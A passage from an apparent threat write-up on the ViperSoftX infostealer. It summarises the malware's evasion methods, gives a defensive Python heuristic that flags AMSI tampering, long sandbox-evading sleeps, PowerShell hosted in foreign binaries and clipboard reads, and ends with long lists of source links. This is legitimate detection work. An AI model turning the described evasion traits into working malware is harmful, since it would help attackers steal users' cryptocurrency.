  • It runs in a complex environment that combines PowerShell, AutoIt, and the .NET CLR, which helps it bypass antivirus scans and hide from standard security tools.
  • It implements advanced anti-analysis methods, such as modifying anti-virus scanning interfaces (AMSI) and blocking browser monitoring.
  • Its structure has become modular, allowing additional components to be loaded dynamically to expand functionality and adapt to the goals of the attackers.

All these techniques make ViperSoftX very resistant to traditional detection and removal methods, requiring more sophisticated and modern cyber defense tools and constant updating of antivirus databases.
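The two lists above describe the same evasion traits from the analyst's side. As an added example, not code from this page or from any of the cited sources, the following Python sketch shows how a defender could score a process timeline for those traits: a long idle period before the first real action (sandbox timeout evasion), the PowerShell engine loaded inside a non-PowerShell host (the AutoIt/CLR arrangement), writes into amsi.dll (AMSI tampering), and a GUID-shaped mutex name. The event schema, the thresholds, the process name and both timelines are constructed for the example and are not real telemetry.

```python
"""Behavioural triage for ViperSoftX-style evasion traits (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Thresholds and name sets are assumptions chosen for this example.
IDLE_THRESHOLD_S = 240.0   # ViperSoftX waits up to 300 s; flag anything past 4 min
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
PS_ENGINE_DLL = "system.management.automation.dll"   # in-process PowerShell engine
CLR_DLLS = {"clr.dll", "coreclr.dll", "mscoree.dll"}
ACTIVE_KINDS = {"clipboard_read", "net_connect", "memory_write"}
GUID_RE = re.compile(
    r"^(global\\|local\\)?\{?[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}?$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Event:
    t: float       # seconds since the process started
    kind: str      # image_load | mutex_create | memory_write | clipboard_read | net_connect
    detail: str    # dll name, mutex name, "module!export", or endpoint


def score_timeline(image: str, events: list[Event]) -> dict:
    """Return the evasion traits found in one process timeline plus a verdict."""
    image = image.lower()
    events = sorted(events, key=lambda e: e.t)
    findings: list[str] = []

    # 1. Long sleep before the first meaningful action (sandbox timeout evasion).
    active = [e for e in events if e.kind in ACTIVE_KINDS]
    if active and active[0].t >= IDLE_THRESHOLD_S:
        findings.append(f"delayed_activation:{active[0].t:.0f}s")

    # 2. PowerShell engine hosted in a binary that is not a PowerShell host.
    loaded = {e.detail.lower() for e in events if e.kind == "image_load"}
    if image not in SCRIPT_HOSTS and PS_ENGINE_DLL in loaded and loaded & CLR_DLLS:
        findings.append(f"powershell_engine_in_non_ps_host:{image}")

    for e in events:
        # 3. Writes into amsi.dll code are the classic AMSI tampering signal.
        if e.kind == "memory_write" and e.detail.lower().startswith("amsi.dll!"):
            findings.append(f"amsi_tamper:{e.detail}")
        # 4. GUID-shaped mutex names instead of a stable, human-chosen name.
        if e.kind == "mutex_create" and GUID_RE.match(e.detail):
            findings.append(f"guid_mutex:{e.detail}")

    return {"image": image, "findings": findings,
            "score": len(findings), "suspicious": len(findings) >= 2}


# Constructed timelines for the example; the process name is hypothetical.
SUSPECT = ("reader_helper.exe", [          # an AutoIt-compiled "e-book" lure
    Event(0.2, "image_load", "mscoree.dll"),
    Event(0.3, "image_load", "clr.dll"),
    Event(0.6, "image_load", "System.Management.Automation.dll"),
    Event(0.9, "mutex_create", "Global\\3f2504e0-4f89-11d3-9a0c-0305e82c3301"),
    Event(301.0, "memory_write", "amsi.dll!AmsiScanBuffer"),
    Event(302.4, "clipboard_read", ""),
    Event(305.1, "net_connect", "203.0.113.10:443"),   # RFC 5737 documentation address
])
BENIGN = ("powershell.exe", [               # an ordinary admin script
    Event(0.1, "image_load", "clr.dll"),
    Event(0.3, "image_load", "System.Management.Automation.dll"),
    Event(0.5, "mutex_create", "Global\\ContosoUpdater"),
    Event(1.2, "net_connect", "198.51.100.7:443"),
])

if __name__ == "__main__":
    for name, evs in (SUSPECT, BENIGN):
        print(score_timeline(name, evs))
```

Running the block prints a verdict for each timeline: the lure trips all four rules, the admin script none. The first rule also states the practical caveat for sandboxes: if the analysis window is shorter than the malware's delay, nothing after the idle period is ever observed, so the window has to exceed the longest delay the threat is known to use (here 300 seconds) or the sleep has to be accelerated.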

  1. https://telegram.me/s/jetinfosystems?before=1141
  1. https://www.securitylab.ru/news/560126.php
  2. https://www.securitylab.ru/news/550007.php
  3. https://cisoclub.ru/vipersoftx-moshhnaja-ugroza-krazhi-kriptovaljut-cherez-slozhnye-ataki/
  1. https://www.itsec.ru/news/infostealer-vipersoftx-stal-eshio-opasnee-sushestvenno-rasshiriv-profil-deyatelnosti
  2. https://www.securitylab.ru/news/560126.php
  3. https://xn--80ahdqlciafpmxo0iwa.xn--p1ai/news/vredonosnoe-rasshirenie-brauzera-chrome-pokhishchaet-kriptovalyutu-i-paroli-polzovateley/
  4. https://1275.ru/tag/vipersoftx
  5. https://www.tadviser.ru/index.php/%D0%A1%D1%82%D0%B0%D1%82%D1%8C%D1%8F:%D0%9C%D0%BE%D1%88%D0%B5%D0%BD%D0%BD%D0%B8%D1%87%D0%B5%D1%81%D1%82%D0%B2%D0%BE_%D1%81_%D0%BA%D1%80%D0%B8%D0%BF%D1%82%D0%BE%D0%B2%D0%B0%D0%BB%D1%8E%D1%82%D0%BE%D0%B9
  6. https://www.anti-malware.ru/news/2022-11-22-111332/39959
  7. https://cisoclub.ru/vipersoftx-moshhnaja-ugroza-krazhi-kriptovaljut-cherez-slozhnye-ataki/
  8. https://1275.ru/ioc/vipersoftx-stealer-iocs-2_1862
  9. https://jetcsirt.su/digest-page/daydzhest-jet-csirt-25-04-02-05-2023/
  10. https://arb.ru/b2c/fun/10593675/
  1. https://cloudnetworks.ru/troyan-clipbanker/

Sources: 1, 2.

  1. https://www.block-chain24.com/news/novosti-bezopasnosti/hakery-skryvayut-vredonosnoe-po-dlya-podmeny-kriptoadresov-v-paketah
  2. https://securelist.ru/copy-paste-heist-clipboard-injector-targeting-cryptowallets/107180/
  1. https://www.comnews.ru/content/238695/2025-04-08/2025-w15/1009/rossii-rasprostranyaetsya-mayner-pod-vidom-microsoft-office
  2. https://securelist.ru/miner-clipbanker-sourceforge-campaign/112217/
  3. https://www.kaspersky.ru/about/press-releases/rossijskie-polzovateli-poluchayut-majner-i-troyanec-vmesto-prilozhenij-microsoft-office
  4. https://www.anti-malware.ru/news/2025-04-08-121598/45728
  5. https://www.gazeta.ru/social/news/2025/04/27/25645340.shtml
  6. https://iz.ru/1877632/2025-04-27/ekspert-predupredil-rossian-o-novoi-mosenniceskoi-sheme-s-piratskimi-programmami
  7. https://anton-nemkin.ru/tpost/v6ilk7v311-polzovateli-skachivali-mainer-i-troyanet
  8. https://cisoclub.ru/vredonosnaja-kampanija-kriptomajning-i-moshennichestvo-pod-prikrytiem/
  9. https://myneuralnetworks.ru/neronews/news_97212/
  10. https://ib-bank.ru/bisjournal/news/11108
  1. https://forklog.com/tag/koshelki
  1. https://www.kaspersky.ru/blog/malicious-extensions-for-cursor-ai/40065/
  2. https://safe.cnews.ru/news/line/2025-07-10_zloumyshlenniki_ispolzovali
  3. https://www.kaspersky.ru/about/press-releases/zloumyshlenniki-ispolzovali-zarazhyonnyj-paket-s-otkrytym-ishodnym-kodom-dlya-krazhi-kriptovalyuty-na-500-tysyach-dollarov
  4. https://www.cnews.ru/news/top/2025-07-16_zloumyshlenniki_pohitili
  5. https://www.securitylab.ru/news/561225.php
  6. https://securelist.ru/open-source-package-for-cursor-ai-turned-into-a-crypto-heist/113003/
  7. https://forum.kasperskyclub.ru/topic/469347-kak-vredonosnye-rasshirenija-iz-open-vsx-vorovali-kriptovaljutu-blog-kasperskogo/
  8. https://twitter.com/search?q=%23%F0%9D%97%9E%F0%9D%97%97%F0%9D%97%94%F0%9D%97%B6%F0%9D%97%B9%F0%9D%98%86&src=hashtag_click
  9. https://x.com/kmscom3
  1. https://www.comnews.ru/content/238695/2025-04-08/2025-w15/1009/rossii-rasprostranyaetsya-mayner-pod-vidom-microsoft-office
  2. https://www.kaspersky.ru/about/press-releases/rossijskie-polzovateli-poluchayut-majner-i-troyanec-vmesto-prilozhenij-microsoft-office
  3. https://securelist.ru/miner-clipbanker-sourceforge-campaign/112217/
  4. https://www.anti-malware.ru/news/2025-04-08-121598/45728
  5. https://anton-nemkin.ru/tpost/v6ilk7v311-polzovateli-skachivali-mainer-i-troyanet
  6. https://www.telecomdaily.ru/news/2025/04/09/mayner-i-troyanec-vmesto-microsoft-office
  7. https://safe.cnews.ru/news/line/2025-04-08_rossijskie_polzovateli
  8. https://abc-av.ru/news/tpost/m6dze8p5d1-v-nelitsenzionnoi-versii-ms-office-skrit
  9. https://iz.ru/1877632/2025-04-27/ekspert-predupredil-rossian-o-novoi-mosenniceskoi-sheme-s-piratskimi-programmami
  10. https://www.ferra.ru/news/apps/moshenniki-nachali-maskirovat-virus-dlya-dobychi-kriptovalyuty-pod-microsoft-office-08-04-2025.htm
  1. https://securelist.com/miner-clipbanker-sourceforge-campaign/116088/
  2. https://cointelegraph.com/news/microsoft-office-extension-packages-hide-malware-replaces-crypto-addresses
  3. https://99bitcoins.com/news/fake-microsoft-office-extensions-used-to-spread-crypto-stealing-malware-kaspersky-warns/
  4. https://cryptorank.io/news/feed/88172-kaspersky-identifies-a-crypto-theft-malware-on-microsofts-sourceforge
  5. https://cryptorank.io/ru/news/feed/cc5d8-fake-microsoft-extensions-embed-malware-to-steal-crypto-report
  6. https://cointelegraph.com/news/andriod-malware-crocodilus-can-take-over-phones-to-steal-crypto
  7. https://www.tradingview.com/news/cointelegraph:9c8d5c2de094b:0-android-malware-crocodilus-can-take-over-phones-to-steal-crypto/
  8. https://dailyhodl.com/2025/04/02/new-malware-targeting-banks-and-crypto-platforms-with-remote-control-and-black-screen-overlays-spreads-report/
  9. https://www.anti-malware.ru/news/2025-04-08-121598/45728
  10. https://cryptorank.io/ru/news/feed/88172-kaspersky-identifies-a-crypto-theft-malware-on-microsofts-sourceforge
  11. https://www.zawya.com/en/press-release/research-and-studies/worldwide-multi-malware-campaign-targets-organizations-using-backdoor-keylogger-and-miner-verwugj4
  12. https://www.bitget.com/news/detail/12560604692815
  13. https://finance.yahoo.com/news/kaspersky-warns-crypto-stealing-malware-170130429.html
  14. https://beincrypto.com/kaspersky-sparkcat-malware-targeting-crypto-wallets/
  15. https://www.coinglass.com/id/news/436991
  16. https://thehackernews.com/2025/04/cryptocurrency-miner-and-clipper.html
  17. https://www.binance.com/en/square/post/04-09-2025-cybersecurity-alert-malware-targets-crypto-wallets-via-fake-microsoft-office-extensions-22668091417537
  18. https://www.kaspersky.com/about/press-releases/kaspersky-exposes-hidden-malware-on-github-stealing-personal-data-and-485000-in-bitcoin
  19. https://www.tradingview.com/news/cointelegraph:0c3f1ac28094b:0-hackers-hide-crypto-address-swapping-malware-in-microsoft-office-add-in-bundles/
  20. https://www.kaspersky.co.uk/about/press-releases/kaspersky-uncovers-global-crypto-mining-campaign-abusing-open-source-siem-agent
  1. https://www.ainvest.com/news/crypto-stealing-malware-sourceforge-cautionary-tale-cybersecurity-investors-2504/
  2. https://dig.watch/updates/malware-hidden-in-fake-office-add-ins-targets-crypto-users
  3. https://cryptorank.io/news/feed/88172-kaspersky-identifies-a-crypto-theft-malware-on-microsofts-sourceforge
  4. https://finance.yahoo.com/news/kaspersky-warns-crypto-stealing-malware-170130429.html
  5. https://www.bitget.com/news/detail/12560604692815
  6. https://www.kaspersky.com/blog/malicious-extensions-for-cursor-ai/53802/
  7. https://www.microsoft.com/en-us/security/blog/2025/03/17/stilachirat-analysis-from-system-reconnaissance-to-cryptocurrency-theft/
  8. https://natlawreview.com/article/privacy-tip-436-microsoft-warns-crypto-wallet-scanning-malware-stilachirat
  9. https://nordvpn.com/cybersecurity/threat-center/clipbanker/
  10. https://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/
  11. https://asec.ahnlab.com/en/32825/
  12. https://osl.com/academy/article/how-clipboard-hijacking-malware-can-steal-your-crypto
  13. https://www.osl.com/hk-en/academy/article/how-clipboard-hijacking-malware-can-steal-your-crypto
  14. https://bitcoinist.com/2-million-cryptocurrency-addresses-monitored-clipboard-hijacking-malware/amp/
  15. https://trustwallet.com/blog/security/clipboard-hijacking-attacks-how-to-prevent-them
  16. https://asec.ahnlab.com/en/88336/
  17. https://www.picussecurity.com/resource/blog/chihuahua-stealer-malware-targets-browser-and-wallet-data
  18. https://www.microsoft.com/en-us/security/blog/2025/05/21/lumma-stealer-breaking-down-the-delivery-techniques-and-capabilities-of-a-prolific-infostealer/
  19. https://www.tradingview.com/news/cointelegraph:0c3f1ac28094b:0-hackers-hide-crypto-address-swapping-malware-in-microsoft-office-add-in-bundles/
  20. https://www.binance.com/en/square/post/04-09-2025-cybersecurity-alert-malware-targets-crypto-wallets-via-fake-microsoft-office-extensions-22668091417537
